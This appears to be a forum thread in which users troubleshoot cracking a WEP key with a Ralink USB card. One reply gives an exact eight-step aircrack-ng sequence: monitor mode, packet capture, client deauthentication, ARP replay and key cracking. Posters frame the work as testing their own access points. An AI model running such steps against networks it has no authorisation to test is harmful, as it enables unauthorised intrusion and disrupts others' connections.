I have a rausb0 card and when I followed xplotiz's tutorial everything works except when I try to crack the WEP key.
For some reason I get IVs really slowly, like 20 in 5 minutes.
Is this because my network does not have much traffic?
And if this is true, how can I increase the traffic without logging into it?
http://forums.remote-exploit.org/showthread.php?t=9063
Also, make certain that your wnic supports injection and is in monitor mode.
Many factors can slow you down. Your proximity to the access point is one. Another rather foolish mistake I have made in the past is not specifying a channel. This will cause you to collect the packets you want intermittently, slowing you down greatly. And to continue with what GunMonkey asked, what is the result of the following command:
Code:
bt ~ # aireplay-ng -9 rausb0
Thanks for your reply. I think my problem is just that there is no traffic, so I have to wait a while.
As long as there is one client associated with that network you can gather enough IVs to crack it in say...under a minute. What you need to do (which I am sure is explained clearly in the tutorial) is find the client associated with the AP and de-authenticate him/her. This will force the reconnect and allow you to replay the ARP requests that follow next. Here are the EXACT steps I used to crack my WEP.
NOTE: It may be necessary to set your MAC to that of the client you wish to disassociate from the AP. It was not necessary for me and I don't really see why it would be but others claim it is.
Code:
1: bt ~ # ifconfig rausb0 up
2: bt ~ # iwconfig rausb0 mode monitor channel *channel* rate 1m
3: bt ~ # iwpriv rausb0 forceprism 1
4: bt ~ # iwpriv rausb0 rfmontx 1
5: bt ~ # airodump-ng --channel *channel* -b *00:bssid:00* -w *capfile* rausb0
6: bt ~ # aireplay-ng -0 5 -a *00:bssid:00* -c *00:client mac:00* rausb0
7: bt ~ # aireplay-ng --arpreplay -b *00:bssid:00* -h *mac of associated client* rausb0
8: bt ~ # aircrack-ng -z -b *00:bssid:00* *capfile*.cap
Obviously the starred items are variables; set them to the appropriate values. Lines 1-4 put a Ralink USB dongle into monitor mode assuming you are using the correct drivers and configuration (line 4 is important for the replay attack). Backtrack 2 does NOT have the right configuration for Ralink by default (BT3b does).
Keep in mind I was about 4 feet away from the router so obviously the signal strength was not a limiting factor.
Let me know how this works out for you.
Hello,
I have a rausb device too but I'm having difficulties in cracking WEP... meaning my auth/deauth is not working... I'm next to my AP, which is a D-Link, and when I type:
aireplay-ng -1 0 -a (bssid) -h (mac address of client) rausb0 it says:
Sending authentication request (Open System) a few times and then:
Attack was unsuccessful ..
1. I'm very close to the AP so distance isn't a problem
Card supports injection
I think MAC filtering is off, but if it was on couldn't I still auth/deauth using a cloned MAC?
I'll look in the D-Link's settings and see if filtering is on or off...
Also tried wesside-ng but I get the error max retransmits for 30 bytes and when I tried the -k 1 solution it says invalid option --k ......
Ok so what are the errors you are getting when you type in the commands I posted? You are using the commands I posted, aren't you?
Which Backtrack are you using? 2 or 3b? If you are using 2 see this thread.
You "think mac filtering is off?" Haha, it's your AP, so log in and check it out. Turn it off if it is giving you a problem and see how you do without it.
I am using the correct commands...
Yes, it is my AP, but I didn't know where MAC filtering was, that's why I said I don't know for sure... I watched the settings more carefully and the MAC filter was on. I turned it off and now it works... but I get IVs really slowly and there aren't enough to crack the WEP key... I'll put something to download on my client and make some traffic and see how that goes...